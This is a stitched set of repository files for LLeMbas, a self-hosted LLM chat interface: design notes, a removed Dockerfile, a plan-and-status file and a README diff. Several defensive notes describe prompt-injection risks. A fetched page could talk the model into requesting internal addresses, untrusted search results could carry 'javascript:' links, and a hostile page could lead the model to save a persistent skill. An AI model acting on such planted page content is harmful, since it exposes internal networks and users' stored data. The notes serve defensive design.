from the environment at startup. `services/settings_store.py` is instance
settings an admin edits at runtime, stored in the `settings` table. Environment
variables seed the latter as an *initial* value only — once stored, the database
wins, or a toggle in the UI would silently revert on the next restart.
**Permissions are a union, and admins bypass them.** `security/permissions.py`
resolves a baseline (instance setting) widened by each group. A group grants;
it never denies — otherwise "why can this user not do X" needs a simulation of
every group to answer. Model *access* is separate: `models_visible_to()`.
**FastAPI cannot tell an empty form field from an absent one.** With
`x: str | None = Form(None)`, a submitted `x=` arrives as `None`, so "clear this
field" is indistinguishable from "leave it alone". `api/chats.py:update_chat`
reads `await request.form()` and checks key presence instead. Anything with a
clearable field must do the same.
**`Mapped[list]` without an element type is not a collection.** SQLAlchemy
treats a bare `Mapped[list]` as a scalar and hands back `None` instead of `[]`.
Always write `Mapped[list[Group]]`, with a `TYPE_CHECKING` import if the class
lives in another module.
**Reasoning arrives two ways.** A `reasoning_content` delta field (llama.cpp,
llama-swap, vLLM) or `<think>` tags inline in `content` (Ollama and friends).
`services/reasoning.py` handles the second with a streaming splitter, because
the tags arrive split across chunks. Reasoning is stored in `Message.reasoning`
and is deliberately **not** replayed as context on the next turn.
**Attachments are typed by their bytes, not their name.** `services/files.py`
sniffs magic numbers; a `.png` full of text is stored as text. Images are
downscaled and re-encoded (a phone photo is megabytes of base64), PDFs have
their text extracted **once at upload** — re-extracting per request would let a
reply change because a parser was upgraded.
**Images only go to models marked `vision`.** Sending content parts to an
endpoint without multimodal support is not graceful degradation; most reject
the whole request. `build_request()` checks the capability and falls back to a
plain string. A plain text turn must *stay* a plain string for the same reason.
**Attachments are served, never linked.** Images reach the model as base64 data
URIs: a local endpoint has no route back to LLeMbas and a hosted one has no
credentials. Non-images are served `Content-Disposition: attachment` with
`nosniff`, so an uploaded `.html` cannot execute in this origin.
**Uploads are unbound until the message is sent.** `Attachment.message_id` is
null in the composer; `files.claim()` binds them, and only unclaimed rows owned
by that user, so a forged id cannot pull in someone else's file. Abandoned ones
are swept at startup.
**Generation is a background task; the SSE endpoint only follows it.**
`services/generation.py` owns the work and the registry; `api/chats.py:_follow`
watches a `Generation` and streams what it sees. Closing the connection does
NOT stop the reply -- that was the old behaviour and it cut answers off when
the reader navigated away. Any route that creates an assistant placeholder must
also call `generation.ensure()`.
**`ensure` attaches, `restart` replaces.** The registry is keyed on message id
and finished generations linger `KEEP_FINISHED` so a follower arriving at the
last moment still gets the final frames. `ensure` is idempotent because a page
load finding an unfinished reply must attach rather than start a second one.
Regeneration is the only caller that reuses a `Message` row, and therefore the
only one for which idempotence is wrong -- it got the finished generation back,
made no request, and left the browser reconnecting to a stream with nothing to
say. It calls `restart`. `_persist` refuses to write when another generation
owns the message, because a cancelled predecessor's `finally:` still runs.
**The row is written before `done` is set.** `_follow` breaks out the instant it
sees that flag and re-renders the bubble from the database, so the row has to be
authoritative first. The other order silently showed the previous turn's stored
metrics.
**Stream frames carry whole blocks, not deltas.** `render`, `reasoning`,
`metrics` and `status` all send the complete value each time, and every one of
them is swapped with `innerHTML`. `reasoning` used `beforeend` and so repeated
everything already shown on every frame. That is what makes reattaching mid-reply
work: a follower arriving late has no earlier fragments to append to. It also
means Markdown is re-rendered whole, which is required anyway -- a list or code
fence is only correct once its context exists.
**Stopping sets a flag the producer checks.** `generation.request_stop()`;
whatever arrived is kept and the message is marked `stopped`, which is distinct
from `error`. In-process, so single-worker only.
**Unread is polled, not pushed.** A browser on another chat has no connection
to the one that finished. `/api/chats/unread` returns out-of-band dot spans and
an `HX-Trigger` for the toast; `unread_notified` stops the same arrival being
announced every tick. Re-rendering the whole sidebar instead would reset the
folder open/closed state every 10 seconds.
**Editing rewinds, it does not branch.** `POST .../messages/{id}/edit` rewrites
a user turn and **deletes everything after it**. Branching would need a UI for
choosing between versions; "go back and try again from here" is what was asked
for and what other clients do. `Message.parent_id` still exists unused.
**Dialogs and toasts are ours, not the browser's.** `static/js/ui.js` provides
`lembas.notify/confirm/prompt`, and intercepts htmx's `htmx:confirm` so every
existing `hx-confirm` gets the themed dialog with no change at the call site.
Plain forms opt in with `data-confirm`, lone submit buttons with
`data-confirm-button`. Never add a `window.confirm` back.
**The model picker is hand-built.** A `<select>` renders only text in an
`<option>` -- no avatar, no description, no badges. `chat/_model_picker.html`
plus the picker block in `ui.js`; the value lives in a hidden input so it still
behaves as a form field.
**Chats are created lazily.** There is no endpoint that makes an empty chat.
"New chat" is a link to `/chat`, which renders a composer with no row behind
it; `POST /api/chats/start` writes the chat together with its first message.
That is why an opened-and-abandoned chat never appears in the sidebar. Tests
that just need a chat use the `make_chat` fixture rather than the HTTP flow.
**Admin lists are list-plus-detail, never a form per row.** `/admin/models`
renders compact rows with search, filter tabs and pagination; the full form
lives at `/admin/models/{id}/edit`. A connection can advertise a hundred models,
and a page that renders a form for each is unusable. Any future admin list
(tools, agents) should follow the same shape.
**Route order matters for static path segments.** FastAPI matches in
registration order, so `/admin/models/bulk` must be registered *before*
`/admin/models/{model_id}` or "bulk" is parsed as a model id and 404s. This has
already been a bug once.
**Pinning is not ordering.** The model picker is always in the administrator's
`position` order. Pinned models get shortcuts in the chat sidebar and nothing
else -- a picker whose order differs from the admin screen is just confusing.
**System prompts are precedence, not concatenation.** chat > model > instance,
most specific wins outright (`services/chat.py:effective_system_prompt`).
Stacking them reads well in a settings screen and badly in practice: two layers
that disagree give the model contradictory instructions and nobody can tell
which is losing.
**JSON columns need reassignment.** `user.settings_json["theme"] = x` on a
plain dict is not detected. The columns use `MutableDict` (`db/types.py`), but
the safe habit is `obj.field = {**obj.field, "k": v}`.
**`[hidden]` needs `!important`.** The browser's rule is `[hidden] { display:
none }`, which any class setting `display` outranks — and `.btn` is
`display: inline-flex`. That is not theoretical: it is why the old Stop button,
created and then `hidden = true`, sat permanently beside Send. `app.css` forces
the attribute to win. Anything toggled with `hidden` depends on that line.
**Send and Stop are one button.** `chat/_composer.html` renders both icons and
`ui.js` flips `data-composer-action` plus `type` (`submit``button`) when a
message in the thread is still streaming. Do not add a second button back.
**The tool loop is inside one generation.** `services/generation.py:_run()` runs
up to `tools_service.MAX_ROUNDS` request rounds for a single reply: stream,
accumulate tool calls, run them, append the results, ask again. `Generation`
accumulates content across all of them, so text emitted before a tool call
survives. Tools are only offered when search is enabled, the user has
`tools.web_search`, **and** the model is flagged `tools` — sending a `tools`
array to an endpoint without support fails the whole request, exactly as images
do without `vision`.
**Tool-call arguments arrive in fragments.** `delta.tool_calls` carries an
`index`, a name that appears once, and an `arguments` string split across
chunks. `tools.ToolCallAccumulator` rejoins them keyed on `index` — not on
name, which breaks the moment a model calls one tool twice in a turn.
**Four stores, four different reasons.** `services/library/``documents`
(uploaded by a person, searched by the model), `notes` (written by the model,
searched), `memories` (short, and *injected whole* every turn), `skills` (index
injected, body fetched by tool). The shape of each follows from how it reaches
the model: a memory is capped short because it costs tokens on every request
forever, a note is not injected because a dozen would fill the window.
**Documents live in knowledge bases, and the base is what is shared.** A
`Document` always belongs to a `KnowledgeBase`; visibility comes from the base,
never the document, which is why `Document` is absent from
`sharing.RESOURCE_TYPES` and `documents.visible()` filters on
`base_id IN (visible bases)`. Per-document grants would mean answering "who can
see this?" by checking every file. `Document.base_id` is nullable only because
the column had to be added to a table that already had rows;
`documents.sweep_unfiled()` runs at startup and files anything predating bases
into its owner's default.
**A chat attached to bases is scoped to them.** `Chat.knowledge_bases` is
many-to-many; empty means "everything the owner can see", not "nothing".
`tools.context_for(db, user, chat)` carries the ids and `knowledge_search`
filters on them — and the harness names the bases, because otherwise the model
cannot tell "there is nothing about this" from "I am only allowed to see the
contracts folder".
**Sharing goes through one helper, and admins do not bypass it.**
`services/sharing.py:visible_to()` is the only definition of who can see a
library item, and every listing and tool uses it. `permissions.resolve` gives an
admin everything, deliberately — but that is about configuration, which an admin
can grant themselves anyway. Reading someone's private notes is not the same
act, so `sharing` has no admin branch. Sharing grants **reading only**.
**FTS5 tables are outside the model-driven schema sync.** They are not
SQLAlchemy models, so `sync_schema()` cannot diff them; `db/migrations.py:
ensure_fts()` writes them out with `IF NOT EXISTS` and creates the triggers that
keep an external-content index correct. It runs at every startup and converges,
like the column sync beside it. `tests/conftest.py` calls `sync_schema` rather
than `create_all` so tests run against the same schema.
**A failed search rolls back.** One broken FTS statement otherwise leaves the
session unusable and every later query in the request fails too, which looks
nothing like a search problem.
**Knowledge attachments are copies.** Attaching a library document to a message
duplicates its text and its file (`files.copy_document`). Referencing it would
mean a conversation changing when a document is edited or deleted later — the
same reason PDF text is extracted once at upload.
**The link fetcher is an SSRF hole unless guarded.** `services/fetch.py` refuses
loopback, private and link-local addresses **after resolution** — a hostname
pointing at 127.0.0.1 walks past any check that only reads the URL — and follows
redirects by hand so every hop is checked. An admin can open it deliberately.
The URL can come from a model, which can be talked into things by a page it just
read.
**The harness is an exception to the prompt-precedence rule, on purpose.**
"System prompts are precedence, not concatenation" governs the three *authored*
layers, and it stands: exactly one still wins, and `effective_system_prompt`
still decides which. `services/harness.py` is a different axis — it describes
the machinery rather than the behaviour, nobody authored it, and there is
nothing for it to disagree with. It is prepended to whichever authored prompt
won, in one system message (several endpoints reject a second one), and
`build_request` is where the two meet.
**The harness holds no text.** Every piece of it is a `Fragment` in
`services/prompts.py`, edited on `/admin/prompts`. `harness.py` decides which
fragments apply and what their variables resolve to; `prompts.py` owns the
wording, the storage and the substitution, and knows nothing about chats or
tools. Four rules hold the whole thing up:
- **Defaults live in code, overrides live in the database**, and text equal to
its default is never stored. That is what lets a later release improve a
default and have it reach an instance whose administrator once pressed Save.
- **An empty override means off**, which is why there is no separate enable
flag: clearing the box in the admin page *is* the switch. A fragment that was
not submitted at all keeps whatever it had — it may be missing from the page
because the thing contributing it is switched off.
- **A fragment carries its gate as data** (`families`, `requires`,
`when_tools`), never as a callable, because a database row can carry the same
three fields. `requires` is why there is no longer a hand-written pair of
memory-guidance variants: the sentence that refers to a section lives *inside*
that section, so it cannot outlive it.
- **`{{name}}`, and anything unrecognised passes through verbatim.** Names are
lowercase letters, digits and underscores, so `{"total": 1}` and `${PATH}` are
never candidates. Substitution is one pass and never recursive — `{{memories}}`
carries text a model wrote, and a memory reading `{{skills}}` must not expand.
A model with no tools now gets the core fragments too, the date above all.
"An empty harness is worse than none" was about tokens that say nothing, and a
model with no clock being asked about the present is not that. Clearing those
fragments restores the old silence exactly.
**Tool descriptions are not fragments.** They are schema, sent verbatim in the
`tools` array, and they state facts about what a runner does — an administrator
editing `notes_edit`'s "omit a field to leave it alone" would make the text a
lie with nothing to catch it. The page lists them read-only so nothing injected
is hidden. A *custom* tool's description will be editable, because it is a row.
**A model's tool flags default to on when `tools` is on.** Rows configured
before the per-tool split have no `tool_*` keys. Reading absent as off would
silently take web search away from every model already set up for it, so
`tools.enabled_tools` treats absent as inherited.
**Tool results are not replayed.** Like reasoning, `Message.tool_calls_json` is
stored and rendered but never fed back as context. The answer already contains
what the model made of the results; replaying stale results and the schema into
every later request wastes the window and reliably sends a small model into a
search loop. The sources stay visible in the transcript.
**Search results are untrusted.** Hard rule 6 covers them as much as model
output. `chat/_tool_activity.html` escapes everything and only renders `http`
and `https` URLs as links — a result carrying a `javascript:` URL must never
become an anchor.
**A message bubble is rendered from four places.** `pages.py`,
`chats.post_message`, `chats.regenerate` and `chats._follow`. Each needs
`audio_service.template_flags(db, user)` or the speaker button's conditions are
undefined; the template uses `| default(false)` so a missed one degrades to no
button rather than an exception. `_follow` also passes `just_finished`, which is
what read-aloud-automatically keys off — without it, reopening a chat would
start reading its last reply out loud.
**Dictation audio never touches disk.** `api/audio.py` reads it into memory,
capped, and streams it upstream. It is not an attachment: it has no owner, no
row, and nothing would ever sweep it.
**The service worker must skip `/api/`.** A reply is an endless event stream and
passing one through a worker turns it into one delivery at the end, or nothing.
`static/js/sw.js` bails out on `/api/`, `/auth/`, `/admin/` and any request
accepting `text/event-stream`. It is served from `GET /sw.js` rather than the
static mount because a worker's scope is the path it came from.
## Changing the schema
There is no Alembic, but there *is* `db/migrations.py`. It compares the declared
models against the live database and issues `ALTER TABLE ... ADD COLUMN` for
anything missing, so adding a column to a model is free: restart and it appears,
with existing rows backfilled from a type-derived default.
**A nullable column is added with no default**, so existing rows get NULL --
the value the model treats as absent. Only a NOT NULL column gets one, because
SQLite refuses to add one without. An earlier version defaulted every column by
type, which meant an added foreign key arrived as `""` on old rows and every
"is this set?" check downstream was wrong about them.
It cannot rename, drop or retype a column, or add a UNIQUE/PRIMARY KEY to an
existing table — SQLite mostly cannot do those with ALTER TABLE either. Those
need the create-copy-swap dance by hand; record them in `MANUAL_STEPS` so a
failure has somewhere to point.
Because the runner exists, forward-looking columns are cheap now. `Message.parent_id`
and `content_parts_json` (branching, multimodal) predate it and are still unread.
## Artwork
Do not hand-edit files in `assets/` — they are generated. Change
`scripts/build_artwork.py` and re-run it. It also copies the few files the app
serves into `web/static/img/`.
The leaf geometry is defined once (`LEAF_BLADE`, `LEAF_MIDRIB`, …) and reused by
the icon, favicon, lockup and banner. The 64×64 mark must stay legible at 16px:
the favicon variant drops the score lines, rim and veins because they turn to
mud at that size. The icon sprite is a **template partial**
(`templates/partials/icons.html`), not an asset, because same-document
`<use href="#id">` is universally supported and the cross-document form is not.
The `mark()` macro in `_macros.html` duplicates the mark geometry so it can be
inlined and themed. If the mark changes, update both.
## Deployment
`deploy/` holds a systemd unit template, an nginx vhost template, and
install/update scripts. Both templates are parameterised (`__PREFIX__`,
`__SITE_HOST__`, …) and substituted at install time, so nothing host-specific is
committed here. See `deploy/README.md`.
This repository is **public**. Keep deployment-specific hostnames, ports and
internal infrastructure detail out of it — those belong in whatever private
notes describe the machine.
## Not built yet
Custom tools and MCP, agentic execution (local subprocess and SSH connection
profiles), image generation. Nav entries mark where each one goes. The tool
loop in `services/generation.py` is what they plug into — a new tool is a
`ToolDef` in `services/tools.py:REGISTRY` plus a permission and a capability
flag, not a new code path. Its guidance is the same shape: a
`prompts.register_source` yielding one `Fragment` per tool row puts it in the
harness, on the admin page and in the preview without touching the assembler,
the save handler or a template.
**Unknown is not zero.** `Model.context_length` of 0 means nobody has said how
big the window is, which is different from "small". The context percentage is
omitted rather than computed, and automatic compaction never fires. Token counts
fall back to `services/tokens.py` -- four characters to a token -- and anything
derived from an estimate is shown with a `~`. Compaction *does* act on an
estimate, because a premature compaction costs one turn of answer quality rather
than data: the messages are kept.
**Compaction hides turns, it does not delete them.** `Chat.compact_summary` plus
`compacted_through_id` say how far it reached; the messages stay in the
transcript behind a `<details>` divider and simply stop being part of the
request. The summary is carried by a **user turn and an assistant turn**, not
one: a leading `assistant` breaks templates that require the first non-system
message to be `user`, and a lone leading `user` produces `user, user` whenever
the kept history starts on a user turn -- which it always does, because the
cutoff lands on a finished reply. `compacted_through_id` is a plain id, not a
foreign key, because `migrations.py` compiles only the column type and a
`REFERENCES` clause would exist on a fresh database and not on an upgraded one;
`compaction.cutoff_message` validates it on every read instead.
**Compare message timestamps through `compaction.moment()`.** SQLite does not
store the offset, so a row loaded from disk is naive while one still in the
session's identity map keeps its tzinfo. Comparing the two raises.
No OCR: a scanned PDF is stored with an explanatory `extraction_error` rather
than silently contributing nothing.
-69
View File
@@ -1,69 +0,0 @@
# LLeMbas in a container.
#
# One stage, on purpose. There is nothing to build: no Node, no compiled assets,
# no wheel worth producing separately — the vendored browser libraries are
# committed and the templates are read at runtime. A multi-stage build here
# would be ceremony that saves nothing and hides where the files came from.
#
# **This image is not a deployment on its own.** It serves plain HTTP and expects
# a TLS reverse proxy in front, and that is a constraint rather than a
# preference: a service worker and a microphone both require HTTPS or localhost,
# so over plain http on a LAN address the app installs as nothing and cannot
# dictate. See deploy/README.md.
FROM python:3.12-slim
# `bash` and `git` earn their place: `git` is what /admin/updates reads to say
# what is running, and its absence there is reported rather than crashed on.
# `curl` is the healthcheck below. Everything else stays out.
RUN apt-get update \
&& apt-get install --no-install-recommends -y git curl \
&& rm -rf /var/lib/apt/lists/*
# A real account rather than root, and made before the install so the layers it
# owns are its own. 10001 rather than the first free id: a bind-mounted volume
# on the host is easier to reason about when the id is stated.
RUN useradd --create-home --uid 10001 --shell /usr/sbin/nologin lembas
WORKDIR /app
# The dependency install is its own layer, keyed on the files that decide it, so
# editing a template does not re-resolve the whole tree.
#
# LICENSE is in the list because `pyproject.toml` declares `license = { file =
# "LICENSE" }` and the build backend reads it -- without it the install fails
# with "License file does not exist", which reads like a packaging problem and
# is a missing COPY. README.md is there for the same reason (`readme = `).
COPY pyproject.toml README.md LICENSE ./
COPY src/lembas/__init__.py src/lembas/__init__.py
RUN pip install --no-cache-dir -e ".[search,ssh]"
COPY . .
# Again, because the first install ran against a source tree with one file in
# it. Cheap: everything is already resolved and cached above.
RUN pip install --no-cache-dir --no-deps -e "." \
&& chown -R lembas:lembas /app
# The database, the uploads and the encryption at rest all live here. Declared
# so that running without `-v` still works and says where the data went, rather
# than losing it silently at the first `docker rm`.
ENV LEMBAS_DATA_DIR=/data \
LEMBAS_HOST=0.0.0.0 \
LEMBAS_PORT=8080 \
PYTHONUNBUFFERED=1
RUN install -d -o lembas -g lembas /data
VOLUME ["/data"]
# **No secret key is baked in.** One in an image is one every copy of the image
# shares, and rotating it signs everybody out *and* makes stored upstream API
# keys unreadable. Without LEMBAS_SECRET_KEY the app generates a temporary one
# and warns loudly at startup, which is the right failure: it works for a look
# and cannot be mistaken for a deployment.
USER lembas
EXPOSE 8080
HEALTHCHECK --interval=30s --timeout=5s --start-period=20s --retries=3 \
CMD curl -fsS http://127.0.0.1:8080/healthz || exit 1
CMD ["lembas", "serve"]
+266
View File
@@ -0,0 +1,266 @@
# LLeMbas — plan and status
Where the project is, what is deliberately not built yet, and the decisions
that would be expensive to revisit. Kept current as work lands; the detail of
*how* things work lives in [`CLAUDE.md`](CLAUDE.md).
**Status:** usable daily. Streaming chat, attachments, reasoning, tool calling
with web search, a knowledge library, notes, memory and skills, speech in and
out, users and groups, model administration, installable as an app. 437 tests,
`ruff` clean.
---
## The shape of it
A self-hosted web UI for OpenAI-compatible endpoints, written in Python, themed
after Middle-earth.
| | |
|---|---|
| Stack | FastAPI + Jinja + htmx + a little Alpine |
| Build step | none — no Node, no npm, no CDN at runtime |
| Database | SQLite, schema synchronised additively at startup |
| Deployment | systemd unit + nginx vhost, one worker |
These are load-bearing. Dropping the no-build rule or moving off SQLite would
be a different project, not a refactor.
---
## Done
### Chat
- [x] Streaming replies over server-sent events
- [x] **Markdown renders progressively** — re-rendered whole every 100ms rather
than appending tokens, because a list or code fence is only correct once
its context exists
- [x] Syntax highlighting (Pygments), sanitised with nh3
- [x] **Generation runs in the background** — a task, not the request. Navigate
away, open another chat, close the tab: the reply keeps being written and
reattaching replays the whole state
- [x] **Stop** — the send button becomes Stop while writing; what arrived is kept
- [x] **Rewind** — edit one of your own turns and the conversation runs on from
there. Truncates rather than branching
- [x] Copy, regenerate, automatic chat titles
- [x] Chats created on first message, so an abandoned composer leaves nothing
- [x] **Unread indicator** — a green dot and a toast when a reply lands while
you were elsewhere
- [x] Folders, arbitrarily nested; deleting one keeps the chats inside it
- [x] Per-reply metrics — tokens, context used as a percentage, tokens/second,
live while streaming and kept afterwards. Estimated with a `~` when the
endpoint reports no usage
- [x] Compaction — a button, and automatically at a configurable percentage of
the model's context. Summarised turns are kept and collapsed, not deleted
- [x] Temporary chats — never listed, swept after a day, with a Keep button
- [x] An admin-only request inspector beside the thread
### Tools
- [x] **Tool calling** — one reply is a bounded loop of requests, not one
request. Text produced before a call is kept
- [x] **Web search** as the first tool: DuckDuckGo (no setup), SearXNG or
Firecrawl, chosen in the admin area
- [x] Only offered to models flagged `tools`, because an endpoint without
support rejects the whole request rather than ignoring the array
- [x] Sources stay in the transcript; results are **not** replayed as context on
the next turn, for the same reasons reasoning is not
### The library
- [x] **Knowledge bases** — documents, images and saved web pages, grouped into
named collections and ingested through the same pipeline as chat
attachments, searched with SQLite FTS5
- [x] A chat can be pointed at particular bases, so "answer from the contracts
folder" is a different question from "answer from everything I have"
- [x] **Notes** — longer things the model writes down and searches later;
editable by hand, because they are yours
- [x] **Memory** — short facts, injected on every turn to a budget rather than
searched, and managed in your settings
- [x] **Skills** — saved procedures. Only the name and description are injected;
the body is fetched when the model decides it applies
- [x] A model may write and revise its own notes, memories and skills. Every
skill revision is kept, attributed and revertible — the safety story is a
record and a way back, not a gate
- [x] **Sharing** — a knowledge base, a note or a skill can be shared with a
group or with named people, read-only. One visibility rule, and
administrators do not bypass it. Documents are shared through their base
- [x] **The harness** — an operational prompt assembled from what a model
actually has, so the tools get used rather than ignored
- [x] Attach menu: file, image, a web page fetched on the spot, or a document
from the library
### Audio
- [x] **Dictation** — record in the composer, transcribed by any OpenAI-shaped
`/v1/audio/transcriptions` endpoint. The recording never touches disk
- [x] **Read aloud** — any `/v1/audio/speech` endpoint, with the voice list
discovered from the server where it offers one
- [x] Instance defaults in Admin, per-reader overrides in Settings — voice,
speed, dictation language, and whether replies play automatically
### Models and reasoning
- [x] OpenAI-compatible connections with encrypted keys and model discovery
- [x] **Reasoning display**`reasoning_content` and inline `<think>` tags,
collapsed by default, labelled with how long it took, never replayed as
context
- [x] Model admin as a list plus a page per model; scales to hundreds
- [x] Ordering, pinning (a sidebar shortcut, *not* a reordering), instance
default, per-user default, images, capability flags
- [x] Custom model picker showing avatars, descriptions and capabilities
### Attachments
- [x] Drag, paste or pick images, PDFs and text files
- [x] Images downscaled and sent to vision models as content parts
- [x] PDF and text extracted at upload and placed in the prompt
- [x] Type decided by inspecting bytes, random names on disk, non-images served
as downloads with `nosniff`
- [x] No OCR: a scanned PDF says so rather than silently contributing nothing
### People
- [x] Accounts, argon2, revocable server-side sessions, self-service password
change
- [x] Users and groups with permissions that **union** rather than override
- [x] Model access restricted to chosen groups
- [x] Registration toggle, instance settings stored in the database
### Prompts
- [x] Three layers — instance, model, chat — with the most specific winning
**outright** rather than being concatenated
- [x] Every injected fragment editable at `/admin/prompts`: the tool guidance,
the memory and skill sections, the seam above the authored prompt, and the
request that names a chat
- [x] `{{variables}}` with a legend, values shown as they currently resolve, and
pass-through for anything that is not one
- [x] A preview of the whole assembled system message, including unsaved edits
- [x] Defaults in code and overrides in the database, so improving a default
still reaches an instance that never edited it
### Suggestions
- [x] Admin-managed cards on the new-chat screen; three seeded once at startup
### Interface
- [x] **Installable** — manifest, generated PWA icons, a service worker for the
shell and a themed offline page. The worker deliberately never touches
`/api/`: a reply is an event stream and caching one breaks it
- [x] Two themes (`moria`, `shire`) from one set of design tokens
- [x] Every control sized from `--control-h`, so rows line up by construction
- [x] Toasts and dialogs of our own; no `window.confirm` anywhere
- [x] Original SVG artwork generated from a single source
### Operations
- [x] Additive schema sync — new tables and columns applied at startup
- [x] `deploy/` — systemd unit and nginx templates, install and update scripts
---
## Not built yet
In the order they are likely to be worth doing.
### Custom tools and MCP servers
An MCP client managing configured servers, their tools surfaced alongside the
built-in ones. The loop they plug into exists now — `services/tools.py` is a
registry of thirteen tools and `services/generation.py` already runs bounded
rounds — so this is a client and an admin screen rather than a change to how
chat works.
### Agentic execution
Two modes, as originally specified:
- **local** — subprocess on the machine LLeMbas runs on
- **remote** — SSH connection profiles, with `shell.run` / `fs.read` / `fs.write`
Needs a confirmation model before it does anything. Note that the systemd unit
is deliberately only `ProtectSystem=full` rather than `strict` **because** of
this — revisit the hardening when the real filesystem needs are known.
### Image generation
Left until last from the start, as it needs heavy customisation. ComfyUI is
already running on this machine and is the obvious first target.
### Smaller things
- **OCR** for scanned PDFs
- **Conversation branching** — `Message.parent_id` exists unused; needs a UI for
choosing between versions, which is why rewind truncates for now
- **Chat export** (Markdown, JSON)
- **Semantic search** in the library — the retrieval service is one call, so an
embedding backend can go behind it without touching the tools or the UI
- **Archived chats** — the column exists, nothing surfaces it
- **Per-user quotas**
---
## Known limits
Worth knowing before they surprise someone.
**One worker.** The generation registry and the stop mechanism are in-process.
Running several workers needs that state in the database or a broker, because
the request following a reply would not necessarily land in the process writing
it.
**A restart abandons replies in flight.** Shutdown cancels them and keeps what
each had. There is no resume.
**Schema changes are additive only.** New tables and columns apply themselves;
renames, drops and retypes are manual against the SQLite file. `MANUAL_STEPS`
in `db/migrations.py` is where such a step gets recorded.
**Attachments live on disk, unreferenced files are swept at startup.** No
deduplication, no size quota.
**Unread is polled every 10 seconds.** A push channel would be more responsive
but means an always-on connection per tab for the sake of a green dot.
**Installing needs HTTPS or localhost.** Service workers are unavailable over
plain HTTP, so a LAN install without TLS is a normal browser tab. The
microphone is unavailable for the same reason.
**Tool calling needs a model that supports it.** The `tools` flag is an
administrator's assertion, not something endpoints reliably advertise. Set it on
a model that cannot, and its replies fail rather than degrade.
**Library search is keyword, not semantic.** FTS5 ranks well and needs no
dependency or embedding endpoint, but "how do I get paid" will not find a
document that says "invoicing".
**A model can write its own skills, and they take effect at once.** Marked as
model-authored and fully revertible, but a model that has just read a hostile
page could save a skill that outlives the conversation. The mitigation is that
it is visible and undoable, not that it was prevented.
---
## Deliberate decisions
Recorded because each looks like an oversight until you know the reason.
- **No JavaScript build step.** Browser libraries are hash-pinned and committed.
A self-hosted tool should work offline and not report page views to a CDN.
- **Permissions union, never deny.** With denies, "why can this user not do X"
cannot be answered without simulating every group.
- **System prompts replace, never stack.** Two layers that disagree give the
model contradictory instructions and nobody can tell which is losing.
- **Rewind truncates, does not branch.** Branching needs a UI for choosing
between versions; "go back and try again from here" is what was asked for.
- **Pinning is a shortcut, not an ordering.** A picker whose order silently
differs from the admin screen is confusing.
- **Images only reach models marked `vision`.** Not graceful degradation: most
endpoints reject the entire request rather than ignoring an image part. Tools
are gated the same way, for the same reason.
- **Sharing grants reading, never writing.** Two people editing one note with no
history and no merge is worse than the inconvenience of copying it.
- **Memory is never shareable.** A record about a person is not content to hand
round.
- **Knowledge attached to a message is copied, not referenced.** History must not
change under a conversation because a document was edited later.
- **The harness is prepended to the authored prompt, not a fourth layer.** It
describes the machinery; the authored layers describe the behaviour. Only one
authored layer still wins.
- **Tool results are not replayed.** Like reasoning: the answer already contains
what the model made of them, and replaying stale results into every later
request wastes the window and sends small models into search loops.
- **The service worker caches the shell, never a page with a user in it.** A
cached conversation would be a snapshot that silently went stale, belonging to
whoever was signed in last.
- **Markdown rendered server-side.** One code path produces the streamed and
the stored view, so they cannot disagree.
- **This repository is public.** Deployment hostnames, ports and paths stay out
of it; `deploy/` is templates, and the real values live in private notes.
+9 -275
View File
@@ -8,7 +8,6 @@
</p>
<p align="center">
<img alt="Version 1.0.0" src="https://img.shields.io/badge/version-1.0.0-6B8E4E?style=flat-square">
<img alt="Python 3.11+" src="https://img.shields.io/badge/python-3.11%2B-3E6B7A?style=flat-square">
<img alt="License GPL-3.0" src="https://img.shields.io/badge/license-GPL--3.0-C9A227?style=flat-square">
<img alt="No Node required" src="https://img.shields.io/badge/build%20step-none-6B8E4E?style=flat-square">
@@ -47,42 +46,11 @@ runtime. Clone it, `pip install -e .`, run it.
- **Attachments** — drag, paste or pick images, PDFs and text files. Images are
downscaled and sent to vision models; PDF and text content is extracted and
put in the prompt
- **`@` to name something** — a document from your library, or in an agent chat
a file in the project directory. The reference stays in the sentence you are
writing and the contents come with it
- **`/` for commands** — `/compact`, `/usage`, `/mode plan`, `/effort high`,
`/model`, `/title`, `/terminal`, `/theme`. The list appears as you type and
filters as you go; `/help` shows all of them with the keyboard shortcuts
beside them. A message that merely starts with a slash is still sent as
written, and both `@` and a recognised command are marked in the box as you
type so you can see what will happen before you press Enter
- **Reasoning effort** — `/effort low`, `medium` or `high` on a model marked as
reasoning, with a per-model default in the admin area. Sent two ways at once,
because there is no single field every endpoint reads
- **Folders** — arbitrarily nested, delete a folder without losing the chats
inside it
- **Web search** — offered to the model as a tool it calls when a question needs
it. DuckDuckGo out of the box (no account, no key), or point it at your own
SearXNG, or Firecrawl. The sources stay in the transcript
- **Your own tools** — describe an HTTP call in the admin area (a schema, a URL
template, a secret) and a model can make it. Or add an **MCP server** by URL
and its tools appear beside the built-in ones. Both restrictable to groups,
and neither can be pointed at your own network unless you say so
- **Agent chats** — start a chat as an *Agent* instead, pointed at one of your
own SSH connections and a directory on it, and a model can read files, write
files and run commands **there**. Nothing ever runs on the machine LLeMbas
itself is on. What it may do without asking is a mode you set and can change
mid-conversation: *Manual* shows you everything first, *Edit* writes freely
but asks before commands, *Auto* asks about nothing, and *Plan* reads freely,
changes nothing, and finishes by proposing steps you can carry out with one
button. Adding a host shows you its fingerprint before anything is sent to it
- **A terminal beside the chat** — the same connection, a real shell, opened and
closed like any panel. It survives closing the panel and reloading the page,
so a build keeps running; the model cannot see it, and a button hands it the
output you choose
- **It can ask you things** — a model that needs a decision can stop and put a
few questions on one card, with answers to pick from and a box to write your
own. In any chat, not only an agent one
- **Speech in and out** — dictate a message and have replies read aloud, against
any OpenAI-compatible audio endpoint (whisper.cpp, Speaches, Kokoro…). Each
person picks their own voice
@@ -100,68 +68,21 @@ runtime. Clone it, `pip install -e .`, run it.
- **Model settings** — searchable, filterable list with a page per model:
ordering, pinned models, an instance default and a per-user default, custom
names, descriptions and images. Scales to hundreds of models
- **Things that happen because time passed** — say "every Monday at nine" and a
model can set it up itself, against the same recurrence rule the manual form
uses. A run can file a **report** you read later, send you a message, or work
on in a chat of its own. The reply says the timing back in words, which is the
one moment anybody can check that Monday was understood as Monday
- **News that finds you** — a dot in the sidebar, a count in the tab title while
you are looking elsewhere, and **web push** so a schedule firing at seven in
the morning reaches a browser that is shut. Opt-in per device
- **Helpers** — a reply can hand a self-contained piece of work to another model
that runs on its own and reports back, several at once, so research fans out
instead of queueing. A helper cannot ask questions, cannot send helpers of its
own, and on a machine runs only a fixed list of read-only commands
- **Drawing** — point it at a ComfyUI and a model can make images, against
